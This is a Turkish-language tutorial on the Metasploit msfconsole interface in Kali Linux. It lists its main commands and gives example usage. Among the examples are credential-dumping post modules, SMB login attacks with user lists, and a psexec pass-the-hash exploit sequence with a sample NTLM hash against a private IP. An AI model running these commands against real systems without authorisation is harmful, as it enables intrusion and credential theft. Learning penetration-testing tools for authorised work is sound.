Metasploit Framework, Kali Linux üzerinde “/usr/share/metasploit-framework” altında toplanmıştır.
Kullanım Amaçları
MsfConsole, Metasploit Framework içerisinde en çok destek gören ve tercih edilen arayüzdür. Bunun başlıca sebepleri şu şekildedir:
- Kullanıcı dostudur. Ruby sayesinde Tab tuşu ile tamamlama gibi kullanımı kolaylaştırıcı özelliklere sahiptir.
- En sağlam (stable) konsol tabanlı arayüzdür.
- Merkezi bir arayüz sunar.
- Metasploit ana çatısının her özelliğine (feature) neredeyse tamamına erişim sağlayabilen tek MSF arayüzüdür.
- Metasploit anaçatısındaki özelliklerin yanı sıra, Linux taraflı dış komutlara (ifconfig, ping,… gibi) da erişim sağlanabilir.
- Yardımcı dokümanları en iyi hazırlanmış arayüzdür.
- Bu arayüzün kullanımı için “/usr/share/metasploit-framework” dizini altındaki msfconsole aracı kullanılır. Eğer çevresel değişkenler uygun şekilde yapılandırılmışsa, Kali’de yapılandırılmıştır, herhangi bir dizinde bu komut çalıştırılabilir.
Önemli Komutları
MsfConsole arayüzünde kullanılabilecek önemli komutlar aşağıdaki gibi listelenebilir:
- help veya ? veya <Komut> -h: Yardımcı dokümantasyon sunar.
- info <ModulAdi>: Seçilen modülü veya modüller ile ilgili ön bilgi (Modül adı, versiyonu, çalışacağı platformlar, lisansı, yazarları, tanımı, seçenekleri, referansları, beklenmedik etkileri vs) sunar.
- back: Mevcut modülden geri çıkmak için kullanılır.
- check: Exploit işlemini gerçekleştirmeden önce yapılan kontroldür. Böylece exploit işleminin başarılı olup olunmayacağı kontrol edilir. Çok az sayıda exploit tarafından bu komut desteklenir.
- connect <Senecekler>: Telnet veya netcat araçları gibi, bir sistemin bir portuna bağlantı (connect <IP> <Port>) için kullanılır.
- exit: msfconsole komut satırından çıkılması için kullanılır.
- irb: msf konsolundan, etkileşimli Ruby kabuğuna geçiş için kullanılır.
- jobs <Secenekler>: Arka planda çalışan modülleri sunar, sonlandırır ve yönetir.
- kill <JobId>: Belirtilen arka plandaki işlemi (job) sonlandırır.
- load <EklentiAdi>: Kişisel (“/root/.msf4/plugins”) ve Metasploit anaçatısındaki eklentileri (“/usr/share/metasploit-framework/plugins”) yükler.
- resource <KaynakDosyasi>: msfconsole tarafından yüklenebilecek betik (kaynak) dosyalarını çalıştırır.
- route: Oturum açıldıktan sonra ağlar arasında oturumlar üzerinden geçmek için kullanılır. Ayrıntılı bilgi Pivoting başlığı altında incelenecektir.
- search <ModulBilgisininBirKismi>: Adı, tanımı, referansı gibi bilgisinin belli bir kısmı bilinen modül için arama gerçekleştirilir. Modüller isimlendirilirken “-” yerine “_” kullanıldığından, “_” ile arama yapılması daha doğru sonuçlar verir.
- sessions: Mevcut oturumları (meterpreter oturumu, shell, VNC) listeler ve yönetir.
- set <Secenek> <Deger>: Mevcut modül için belirtilen seçeneğe, belirtilen değeri atar.
- setg <Secenek> <Deger>: Tüm modüller için (global olarak) belirtilen seçeneğe, belirtilen değeri atar.
- save: setg komutu ile yapılan değişiklikleri ayar dosyasına (/root/.msf4/config) kaydeder. Böylece bu ayarlar her zaman kullanılabilir.
- show <Parametre>: Belirtilen parametreye (all, encoders, nops, exploits, payloads, auxiliary, plugins, options) uygun seçenekleri sunar.
- unload <EklentiAdi>: Yüklü eklentiyi kaldırır.
- unset <Parametre>: Değer verilmiş seçeneklerdeki değeri kaldırır.
- unsetg <Parametre>: Değer verilmiş genel seçeneklerdeki değeri kaldırır.
- use <ModulAdi>: Belirtilen modül kullanılır.
- run veya exploit: Modülleri çalıştırmak için kullanılır. Auxiliary modüller için “run”, istismar modülleri için “exploit” kullanılır.
Tavsiye edilen kullanımı:
service postgresql start && msfdb init & msfconsole;${SHELL:-bash}
Örnek Kullanımlar
MsfConsole arayüzü ile çalıştırılabilecek bazı örnek komutlar aşağıdaki gibi listelenebilir.
- msf > help
- msf > sessions -h
- msf > search smart_hash
- msf > search type:post platform:linux path:gather name:virtual author:Carlos
- msf > use post/windows/gather/smart_hashdump
- msf > sessions -l
- msf > sessions -i 4 -c “net localgroup”
- msf > sessions -k 2
- msf exploit(psexec) > set RHOST 192.168.5.74
- msf auxiliary(smb_enumusers_domain)> setg RHOSTS file:/root/Desktop/ipListesi
- msf auxiliary(smb_login)> setg USER_FILE /root/Desktop/kullaniciListesi
- msf > unset PAYLOAD
- msf > unset all
- msf > save
- msf exploit(ms08_067_netapi) > show payloads
- msf > show options
Modülün seçilmesi aşağıdaki gibidir:
search psexec
use exploit/windows/smb/psexec
Modülün genel seçeneklerinin listelenmesi aşağıdaki gibidir:
show options
Modülün seçeneklerinin ayarlanması ve modülün kullanılması aşağıdaki gibidir:
set RHOST 10.60.9.104
set SMBUSER Kerem
set SMBPASS aad3b435b51404eeaad3b435b51404ee:8cfbcf5888624ea67544d80484068c6e
exploit
getuid